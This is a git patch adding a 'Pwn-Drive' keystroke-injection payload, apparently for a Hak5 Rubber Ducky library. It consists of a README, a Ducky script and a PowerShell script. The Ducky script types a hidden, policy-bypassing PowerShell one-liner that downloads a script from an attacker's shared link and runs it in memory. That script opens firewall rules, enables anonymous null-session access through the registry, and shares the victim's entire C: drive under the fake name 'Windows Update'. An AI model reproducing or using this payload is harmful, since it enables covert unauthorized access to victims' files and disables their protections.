From 85ecdd5889c21f778002a6de8409c182cf9e53c6 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Mon, 10 Oct 2022 23:10:33 -0400 Subject: [PATCH] Add files via upload --- .../library/exfiltration/Pwn-Drive/README.md | 107 ++++++++++++++++++ payloads/library/exfiltration/Pwn-Drive/c.ps1 | 14 +++ .../exfiltration/Pwn-Drive/payload.txt | 16 +++ 3 files changed, 137 insertions(+) create mode 100644 payloads/library/exfiltration/Pwn-Drive/README.md create mode 100644 payloads/library/exfiltration/Pwn-Drive/c.ps1 create mode 100644 payloads/library/exfiltration/Pwn-Drive/payload.txt diff --git a/payloads/library/exfiltration/Pwn-Drive/README.md b/payloads/library/exfiltration/Pwn-Drive/README.md new file mode 100644 index 00000000..c3211bb1 --- /dev/null +++ b/payloads/library/exfiltration/Pwn-Drive/README.md @@ -0,0 +1,107 @@ + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# Pwn-Drive + +A payload to share the victims "C:" drive to the network. + +## Description + +This payload will share the entire victims "C:" drive to the entire network for further exploitation. + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/exfiltration/Pwn-Drive/c.ps1 b/payloads/library/exfiltration/Pwn-Drive/c.ps1 new file mode 100644 index 00000000..798b9eea --- /dev/null +++ b/payloads/library/exfiltration/Pwn-Drive/c.ps1 @@ -0,0 +1,14 @@ +#Pwn-Drive + +#Enable Network Discovery +netsh advfirewall firewall set rule group=”network discovery” new enable=yes + +#Enable File and Print +netsh firewall set service type=fileandprint mode=enable profile=all + +#Setting Registry Values for allowing access to drive without credentials +Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force +Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force + +#Sharing the Drive +New-SmbShare -Name "Windows Update" -Path "C:\" \ No newline at end of file diff --git a/payloads/library/exfiltration/Pwn-Drive/payload.txt b/payloads/library/exfiltration/Pwn-Drive/payload.txt new file mode 100644 index 00000000..a5dd5245 --- /dev/null +++ b/payloads/library/exfiltration/Pwn-Drive/payload.txt @@ -0,0 +1,16 @@ +REM Title: Pwn-Drive + +REM Author: atomiczsec + +REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation. + +REM Target: Windows 10 + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1